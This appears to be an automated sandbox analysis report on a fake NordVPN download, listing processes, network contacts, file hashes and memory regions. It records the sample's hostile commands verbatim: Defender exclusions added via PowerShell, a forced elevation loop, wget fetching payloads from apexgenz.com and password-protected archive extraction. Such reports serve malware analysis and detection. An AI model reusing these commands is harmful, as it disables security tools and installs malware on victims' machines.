"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.4.1512091846\1798937739" -childID 3 -isForBrowser -prefsHandle 4544 -prefMapHandle 4540 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1300 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e44030b0-6a2d-4728-a678-f6897fe0e0cc} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 4552 145115a2f58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.5.1946169069\286040142" -childID 4 -isForBrowser -prefsHandle 5000 -prefMapHandle 4996 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1300 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {48b1b25d-d050-42b7-9d6c-a24b299f21bc} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 5008 14511f09c58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.6.500169602\1990768902" -childID 5 -isForBrowser -prefsHandle 4936 -prefMapHandle 4932 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1300 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7e902716-9475-45c0-996a-fa79f2f68a0a} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 5032 14511f0c258 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.7.1205998962\1432607393" -childID 6 -isForBrowser -prefsHandle 5288 -prefMapHandle 5164 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1300 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e73a16d0-cffd-455e-a9e9-294ea1e798fb} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 5276 14511f0d758 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.8.559184309\1915907281" -childID 7 -isForBrowser -prefsHandle 5848 -prefMapHandle 5844 -prefsLen 26285 -prefMapSize 233444 -jsInitHandle 1300 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5967c015-3b37-48fe-831f-3d6948a42493} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 5860 145139ab558 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.9.1771782841\217158023" -childID 8 -isForBrowser -prefsHandle 5056 -prefMapHandle 5108 -prefsLen 26725 -prefMapSize 233444 -jsInitHandle 1300 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {829adee5-4281-4ef9-a610-03061e01936e} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 5048 14512447b58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.10.1618326309\413425509" -parentBuildID 20221007134813 -prefsHandle 4844 -prefMapHandle 4272 -prefsLen 26725 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a284c35b-bbc6-45d5-89c3-7d15b45bcfbb} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 2796 1450e05da58 rdd

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.11.318254061\19738600" -parentBuildID 20221007134813 -sandboxingKind 1 -prefsHandle 3236 -prefMapHandle 3164 -prefsLen 26725 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4fbb6aa6-4d30-414c-b886-0b96befe9b38} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 2864 1450f2f7558 utility

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\NordVPN-10_11\" -spe -an -ai#7zMap27144:88:7zEvent917

C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe

"C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe"

C:\Users\Admin\AppData\Roaming\services\Launhcer.exe

"C:\Users\Admin\AppData\Roaming\services\Launhcer.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"

C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe

"C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "

C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe

"C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe"

C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe

"C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe"

C:\Users\Admin\AppData\Roaming\services\wget.exe

"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/1/1 -P C:\Users\Admin\AppData\Roaming\services

C:\Users\Admin\AppData\Roaming\services\winrar.exe

"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\01plugins*.* "plugin*" C:\Users\Admin\AppData\Roaming\services

C:\Users\Admin\AppData\Roaming\services\plugin16904

C:\Users\Admin\AppData\Roaming\services\plugin16904

C:\Users\Admin\AppData\Roaming\services\wget.exe

"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/2/1 -P C:\Users\Admin\AppData\Roaming\services

C:\Windows\SysWOW64\dialer.exe

"C:\Windows\system32\dialer.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3700 -ip 3700

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3700 -s 628

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap6622:88:7zEvent8870

C:\Users\Admin\AppData\Roaming\services\winrar.exe

"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\02plugins*.* "2plugin*" C:\Users\Admin\AppData\Roaming\services

C:\Users\Admin\AppData\Roaming\services\2plugin20718

C:\Users\Admin\AppData\Roaming\services\2plugin20718

C:\Users\Admin\AppData\Roaming\services\wget.exe

"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/3/1 -P C:\Users\Admin\AppData\Roaming\services

C:\Users\Admin\AppData\Roaming\services\winrar.exe

"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\03plugins*.* "3plugin*" C:\Users\Admin\AppData\Roaming\services

C:\Users\Admin\AppData\Roaming\services\3plugin16826

C:\Users\Admin\AppData\Roaming\services\3plugin16826

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5940 -ip 5940

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5940 -s 856

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 5940 -ip 5940

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5940 -s 904

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5940 -ip 5940

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5940 -s 960

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5940 -ip 5940

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5940 -s 1040

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 5940 -ip 5940

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5940 -s 1020

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5940 -ip 5940

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5940 -s 1020

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5940 -ip 5940

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5940 -s 1140

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 5940 -ip 5940

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5940 -s 1176

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\NordVPN-10_11\" -spe -an -ai#7zMap8338:88:7zEvent13711

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5940 -s 1140

Network

Country Destination Domain Proto
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 41.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
N/A 127.0.0.1:51483 tcp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 8.8.8.8:53 content-signature-2.cdn.mozilla.net udp
US 34.117.237.239:443 contile.services.mozilla.com tcp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 34.160.144.191:443 content-signature-2.cdn.mozilla.net tcp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 shavar.services.mozilla.com udp
US 8.8.8.8:53 push.services.mozilla.com udp
US 8.8.8.8:53 firefox.settings.services.mozilla.com udp
US 34.149.100.209:443 firefox.settings.services.mozilla.com tcp
US 52.25.97.240:443 shavar.services.mozilla.com tcp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 autopush.prod.mozaws.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 autopush.prod.mozaws.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 34.107.243.93:443 autopush.prod.mozaws.net tcp
US 8.8.8.8:53 240.97.25.52.in-addr.arpa udp
N/A 127.0.0.1:51489 tcp
US 8.8.8.8:53 www.google.com udp
DE 142.250.186.68:443 www.google.com tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
DE 142.250.186.68:443 www.google.com udp
US 34.149.100.209:443 prod.remote-settings.prod.webservices.mozgcp.net tcp
US 8.8.8.8:53 68.186.250.142.in-addr.arpa udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 67.185.250.142.in-addr.arpa udp
US 8.8.8.8:53 227.184.250.142.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 40.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 vpngets.com udp
US 172.67.131.227:80 vpngets.com tcp
US 172.67.131.227:80 vpngets.com tcp
US 8.8.8.8:53 vpngets.com udp
US 8.8.8.8:53 vpngets.com udp
US 172.67.131.227:443 vpngets.com tcp
US 172.67.131.227:443 vpngets.com udp
US 8.8.8.8:53 neo.tildacdn.com udp
DE 162.55.188.142:443 neo.tildacdn.com tcp
US 8.8.8.8:53 neo.tildacdn.com udp
US 8.8.8.8:53 neo.tildacdn.com udp
US 8.8.8.8:53 227.131.67.172.in-addr.arpa udp
US 8.8.8.8:53 202.185.250.142.in-addr.arpa udp
US 8.8.8.8:53 142.188.55.162.in-addr.arpa udp
US 8.8.8.8:53 stat.tildacdn.com udp
GB 193.3.17.198:443 stat.tildacdn.com tcp
US 8.8.8.8:53 stat.tildacdn.com udp
US 8.8.8.8:53 stat.tildacdn.com udp
US 8.8.8.8:53 198.17.3.193.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 bitbucket.org udp
AU 104.192.141.1:443 bitbucket.org tcp
US 8.8.8.8:53 bitbucket.org udp
US 8.8.8.8:53 bitbucket.org udp
US 8.8.8.8:53 1.141.192.104.in-addr.arpa udp
US 8.8.8.8:53 bbuseruploads.s3.amazonaws.com udp
US 3.5.28.226:443 bbuseruploads.s3.amazonaws.com tcp
US 8.8.8.8:53 s3-w.us-east-1.amazonaws.com udp
US 8.8.8.8:53 s3-w.us-east-1.amazonaws.com udp
US 3.5.28.226:443 bbuseruploads.s3.amazonaws.com tcp
US 8.8.8.8:53 226.28.5.3.in-addr.arpa udp
US 8.8.8.8:53 s3-w.us-east-1.amazonaws.com udp
US 8.8.8.8:53 bbuseruploads.s3.amazonaws.com udp
US 3.5.28.226:443 bbuseruploads.s3.amazonaws.com tcp
US 8.8.8.8:53 stat.tildacdn.com udp
US 8.8.8.8:53 neo.tildacdn.com udp
US 8.8.8.8:53 neo.tildacdn.com udp
US 8.8.8.8:53 voloz.site udp
US 172.67.145.170:443 voloz.site tcp
US 8.8.8.8:53 voloz.site udp
US 8.8.8.8:53 voloz.site udp
US 8.8.8.8:53 170.145.67.172.in-addr.arpa udp
US 172.67.145.170:443 voloz.site udp
US 8.8.8.8:53 vpnsget.pw udp
US 8.8.8.8:53 vpnsget.pw udp
US 172.67.165.66:443 vpnsget.pw tcp
US 8.8.8.8:53 vpnsget.pw udp
US 8.8.8.8:53 66.165.67.172.in-addr.arpa udp
US 172.67.165.66:443 vpnsget.pw udp
US 8.8.8.8:53 123.10.44.20.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 apexgenz.com udp
NL 185.14.29.199:80 apexgenz.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 199.29.14.185.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
NL 185.14.29.199:80 apexgenz.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
NL 185.14.29.199:80 apexgenz.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp

Files

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gaix9yhh.default-release\datareporting\glean\pending_pings\ab8cdac4-8a8f-4c93-8d2f-7d03ffd575d4

MD5 fb403e3808249a0ef5d50d1108f9770b
SHA1 09c96d890347b6ab12dc250a2764baeef8e703f7
SHA256 f8673694373c1631e2612e2fc05ad0099fad9a49286f0c43a3344f1eb80a6c83
SHA512 d1ce8473cfa30edc0804ed30ae5b5eba24f8d13910f41cb7011ab3b502fee63253371921768b6561584292f4c91cd27d64bc95314f6a800f52e70afe6a34b307

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gaix9yhh.default-release\datareporting\glean\pending_pings\efeb1311-ca69-4ea6-b522-9dc391810200

MD5 23d75d5683d0d770da46ba9c7b518818
SHA1 54102604312975c92706242ec9ef060947becfd9
SHA256 2bf63a115c0e147279e6e32796bf6a24315a6305041c5ce888ac9a73301daef1
SHA512 5a37df93a89144250edeb039721f60c0fe383479ae112c0dda2a430aaeac9ea0aed0fe6b5a34ae6efa83d956ce000ba5b861a81546ff9d1aa4dacc8bf42006fa

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gaix9yhh.default-release\datareporting\glean\db\data.safe.bin

MD5 f05f543617b8face46542d646c55b6d1
SHA1 31a0b7e87707eb1361ecb4bc6f0152a955c4b973
SHA256 ae11567b65bea21ccc814cfec8fcba1109207a4eff99d3fc84ff551c3749645d
SHA512 27aac929a3cd91baec3af5643b89e7903a75ef8044f91c29b471660b26d3e35fbafd2d7c4e3e8985a8a0262818943a23e4ce35bcd94cf1989d018d771ba3e1a0

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gaix9yhh.default-release\prefs-1.js

MD5 1008a57a9212174c182b3793c3fec936
SHA1 ef60d8b64148df6f11fb80f33f00352c4ec63489
SHA256 7b3810d2df381c9ecc386e495e4d2dacf98edcffec141fefdf14ef9e1a330b64
SHA512 a2562c4d8b6e75193c109a128fa4c58f09bda8a93feacdcc782571067c5bf09164fb76b76ca76ee48ff79b5dd9fa43b4b97236bf8c78002d23358d1efb76c80a

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gaix9yhh.default-release\sessionstore-backups\recovery.jsonlz4

MD5 6909468c9f43c288423627fdd7cd5470
SHA1 393d01e5cd85d4a622e2cda5c01aaceaa1edacf1
SHA256 f6c27baddbd79ef5c502740a766b79ab1a268807ca75f2f39f9fb2620d8efbe6
SHA512 8aa7ba379e24c801c25b09152c70c42c877cb0c0fa6d7502fc34d8203729af37bfef488f3bbf407a24710eabd06b8811fae0381b1dc5a0cbde675b77a7605926

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gaix9yhh.default-release\sessionstore-backups\recovery.jsonlz4

MD5 1639e98f6397aed6f1f6cf6a89c20748
SHA1 1879bb1a689b482a9b8d1e0fc0c19d5f9416d702
SHA256 584456e5d5de4ee42642463c4487b10309545ce2c75f14990c5437b1b2aabdd1
SHA512 9d9c7d96b05d006312a07ffce188ccab74c540904d25f10044ce23078ec0f75184ce18dc0d4876f54c95c27428881fdbf79956dfc1205ab1776fb14209731f0b

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gaix9yhh.default-release\sessionstore-backups\recovery.jsonlz4

MD5 69a8226367e9975efcaaf037c6dc1d07
SHA1 ca3d47439ecd6781f23423e3b3973be06a9e07d1
SHA256 1d733f1d4f2c4919f0064552d6f0e2edefa41bd1b4c6ee1d3b22e52f9517196d
SHA512 b08af08ec931c62254dbb70d751ddc4e74d7f250a68c5eadce8e7cd2317076c49a6e7cf7e62c3dbdff9980a2068cd0cc0c36eb4a93cf01a27776f940ba563956

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\gaix9yhh.default-release\thumbnails\49c6eaf24c972ce4720459699ad41679.png

MD5 76197863ae28765b85face61d51e8309
SHA1 57f2e2fb95137aa89326679cb733541253093be8
SHA256 28076a9d77b31f0047d40540d98f85dcb2481eaa516cff0291012254355a856f
SHA512 5a5da73028b2af59b15b820edddc603543615b8a266d4facc36ce475a455befa291f0989f2b283e2ecb8aa7ad199d1cfea65ae90536f403cc43dcad7a50a5679

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gaix9yhh.default-release\sessionstore-backups\recovery.jsonlz4

MD5 0cfbf43267c6264d825234e78b0d683f
SHA1 98e071c20b2e065b256b1f85ce0d8983ba8df464
SHA256 eac65b2c7459ce8a38458e9767a1b44f2056e314c08ad1220896c09d2f8afc32
SHA512 f89fc31fa161e7d24c54b352a44e740a6284e235516f42d96bad6707c7ee0062699eed30045ef06f90dc2bdb6d0d18a0d9da4cc69385a35aea062fcfbda80664

C:\Users\Admin\Downloads\NordVPN-10_11.g2vukrUZ.zip.part

MD5 dc4f1a240f8a940977284ce77f876439
SHA1 6b013a62e9d0d511256f69abc4ded33c7f291772
SHA256 3f80c20fecafcfa264532eae938edb81dd04c8d0335c366f0b3c4c64ad529967
SHA512 f92f00734f19c669c26febe8e227d7a2f3f23b901e21c9a9ec19ad9e4aac9863c9ef32f03b8d646ec4a4e1d67769d833012698c0d720a049f0c9af342d3f29c1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gaix9yhh.default-release\prefs.js

MD5 e29ab0d2aa826448bfb09679b6872a4a
SHA1 22216ffd94871730bdd0239136d175d8c9a726d2
SHA256 9248cf38e788be8a0f998ae84441f199fc5785127872bde784a4458df2f0d4e4
SHA512 8147a2582ca0a8da71f096fbdb040607fd3f2c56e8c7c7686f58862d44425124ca2715b0984509aaf8802a569d8320d6cb72bf6d7a03f0ecd03cf2db5b6cfb33

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gaix9yhh.default-release\sessionstore-backups\recovery.jsonlz4

MD5 965adcaec10c82840e217cf82bd83422
SHA1 ca82b0dcc8023ff30c84a0962480f3e22d573ae2
SHA256 3d389c8ef6f58d1b44f17f491b49b398ac24710d55b7e2773ac8f5b31544fa70
SHA512 f316414c15d38b0af00d4aebc5e5e9dff3f837baeb8b98cc0e5417e4031db43d93bbb505cdc36d04b8a804dd15dea61383d9789ad9f22cddd4041450a2225d34

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gaix9yhh.default-release\sessionstore-backups\recovery.jsonlz4

MD5 446fca81f3127bb659ef84813c02a5e0
SHA1 0a1818f315efc19a9e8e1ba1420ef434f4fbfe15
SHA256 cf3a1aad00a2216474d0ce7e5e63a43cc1c2d41e2d15263a0bfafa2ae9f701bc
SHA512 611de8be487e8592205eea520ea19923acf2ba18e59ba37985e4a1ee6592aa0bf9fd14daabf8cac1f44bd3b29494f3513ad2c85c7bfdd43bea0a7d79a19f70f1

C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe

MD5 93fde4e38a84c83af842f73b176ab8dc
SHA1 e8c55cc160a0a94e404f544b22e38511b9d71da8
SHA256 fb07af2aead3bdf360f555fc872191e43c2f0acbfc9258435f9a30afe272ba03
SHA512 48720aebe2158b8a58fc3431c2e6f68271fbade51303ad9cb5b0493efaec6053ff0c19a898841ef7c57a3c4d042ac8e7157fb3dc79593c1dfcdcf88e1469fdec

C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.dll

MD5 32e7556ff4f5256d15e1fc843cee5e3d
SHA1 b7283061428e9ca741c26dcfc3e869e2fc699f0b
SHA256 b2f5dfcba2018e9b4314c245f6391783bd3717fe02fec3e6edf1b9d1a3801278
SHA512 d39ca3fd8edb7db7e19655ea3aa69d8b0a4008514ed356808b59f7cdf4c109b7efd0ed54f6ea099d37b33f107f234adc4f01a178c90961e88d3c9ed7a8ebe40e

C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe.manifest

MD5 1b6de83d3f1ccabf195a98a2972c366a
SHA1 09f03658306c4078b75fa648d763df9cddd62f23
SHA256 e20486518d09caf6778ed0d60aab51bb3c8b1a498fd4ede3c238ee1823676724
SHA512 e171a7f2431cfe0d3dfbd73e6ea0fc9bd3e5efefc1fbdeff517f74b9d78679913c4a60c57dde75e4a605c288bc2b87b9bb54b0532e67758dfb4a2ac8aea440ce

C:\Users\Admin\Downloads\NordVPN-10_11\data\AppInfo\services\data\Launcher.dll

MD5 f58866e5a48d89c883f3932c279004db
SHA1 e72182e9ee4738577b01359f5acbfbbe8daa2b7f
SHA256 d6f3e13dfff0a116190504efbfcbcd68f5d2183e6f89fd4c860360fba0ec8c12
SHA512 7e76555e62281d355c2346177f60bfe2dc433145037a34cfc2f5848509401768b4db3a9fd2f6e1a1d69c5341db6a0b956abf4d975f28ee4262f1443b192fe177

C:\Users\Admin\Downloads\NordVPN-10_11\data\AppInfo\services\WinRAR.exe

MD5 f59f4f7bea12dd7c8d44f0a717c21c8e
SHA1 17629ccb3bd555b72a4432876145707613100b3e
SHA256 f150b01c1cbc540c880dc00d812bcca1a8abe1166233227d621408f3e75b57d4
SHA512 44811f9a5f2917ccd56a7f894157fa305b749ca04903eeaeca493864742e459e0ce640c01c804c266283ce8c3e147c8e6b6cfd6c5cb717e2a374e92c32a63b2c

C:\Users\Admin\Downloads\NordVPN-10_11\data\AppInfo\services\wget.exe

MD5 8c04808e4ba12cb793cf661fbbf6c2a0
SHA1 bdfdb50c5f251628c332042f85e8dd8cf5f650e3
SHA256 a7b656fb7a45f8980784b90b40f4a14d035b9dc15616465a341043736ec53272
SHA512 9619f96c3180ef3d738ecc1f5df7508c3ff8904021065665c8388a484648e135105e1c1585de1577c8b158f9b5bc241e3ff7f92665e9553e846e1b750ddea20f

C:\Users\Admin\Downloads\NordVPN-10_11\data\AppInfo\services\Launhcer.exe.manifest

MD5 f0fc065f7fd974b42093594a58a4baef
SHA1 dbf28dd15d4aa338014c9e508a880e893c548d00
SHA256 d6e1c130f3c31258b4f6ff2e5d67bb838b65281af397a11d7eb35a7313993693
SHA512 8bd26de4f9b8e7b6fe9c42f44b548121d033f27272f1da4c340f81aa5642adc17bb9b092ece12bb8515460b9c432bf3b3b7b70f87d4beb6c491d3d0dfb5b71fe

C:\Users\Admin\Downloads\NordVPN-10_11\data\AppInfo\services\Launhcer.exe

MD5 e5c00b0bc45281666afd14eef04252b2
SHA1 3b6eecf8250e88169976a5f866d15c60ee66b758
SHA256 542e2ebbded3ef0c43551fb56ce44d4dbb36a507c2a801c0815c79d9f5e0f903
SHA512 2bacd4e1c584565dfd5e06e492b0122860bfc3b0cc1543e6baded490535309834e0d5bb760f65dbfb19a9bb0beddb27a216c605bbed828810a480c8cd1fba387

C:\Users\Admin\Downloads\NordVPN-10_11\data\AppInfo\services\Launhcer.dll

MD5 7de0541eb96ba31067b4c58d9399693b
SHA1 a105216391bd53fa0c8f6aa23953030d0c0f9244
SHA256 934f75c8443d6379abdc380477a87ef6531d0429de8d8f31cd6b62f55a978f6e
SHA512 e5ffa3bfd19b4d69c8b4db0aabaf835810b8b8cccd7bc400c7ba90ef5f5ebd745c2619c9a3e83aa6b628d9cf765510c471a2ff8cb6aa5ad4cf3f7826f6ae84a3

memory/2392-4392-0x00000000737A0000-0x0000000073F50000-memory.dmp

memory/2392-4393-0x0000000004A20000-0x0000000004A30000-memory.dmp

memory/2392-4394-0x0000000004910000-0x0000000004946000-memory.dmp

memory/2392-4395-0x0000000005060000-0x0000000005688000-memory.dmp

memory/2392-4396-0x0000000005030000-0x0000000005052000-memory.dmp

memory/2392-4397-0x0000000005800000-0x0000000005866000-memory.dmp

memory/2392-4398-0x0000000005870000-0x00000000058D6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fpww0w0r.3rh.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2392-4408-0x00000000058E0000-0x0000000005C34000-memory.dmp

memory/2392-4409-0x0000000005F80000-0x0000000005F9E000-memory.dmp

memory/2392-4410-0x0000000005FC0000-0x000000000600C000-memory.dmp

memory/2392-4411-0x0000000004A20000-0x0000000004A30000-memory.dmp

memory/2392-4412-0x0000000006F60000-0x0000000006FF6000-memory.dmp

memory/2392-4413-0x00000000064B0000-0x00000000064CA000-memory.dmp

memory/2392-4414-0x0000000006500000-0x0000000006522000-memory.dmp

memory/2392-4415-0x0000000007600000-0x0000000007BA4000-memory.dmp

memory/4808-4420-0x00000000737A0000-0x0000000073F50000-memory.dmp

memory/4808-4421-0x0000000002F60000-0x0000000002F70000-memory.dmp

memory/4808-4422-0x0000000002F60000-0x0000000002F70000-memory.dmp

memory/4808-4434-0x0000000002F60000-0x0000000002F70000-memory.dmp

memory/2392-4435-0x00000000737A0000-0x0000000073F50000-memory.dmp

memory/4808-4437-0x00000000700E0000-0x000000007012C000-memory.dmp

memory/4808-4436-0x0000000007940000-0x0000000007972000-memory.dmp

memory/4808-4447-0x0000000006CE0000-0x0000000006CFE000-memory.dmp

memory/4808-4448-0x0000000007980000-0x0000000007A23000-memory.dmp

memory/4808-4449-0x00000000080F0000-0x000000000876A000-memory.dmp

memory/4808-4450-0x0000000007B20000-0x0000000007B2A000-memory.dmp

memory/4808-4451-0x0000000007CA0000-0x0000000007CB1000-memory.dmp

memory/4808-4452-0x0000000007CE0000-0x0000000007CEE000-memory.dmp

memory/4808-4453-0x0000000007CF0000-0x0000000007D04000-memory.dmp

memory/4808-4454-0x0000000007D30000-0x0000000007D4A000-memory.dmp

memory/4808-4455-0x0000000007D20000-0x0000000007D28000-memory.dmp

memory/4808-4458-0x00000000737A0000-0x0000000073F50000-memory.dmp

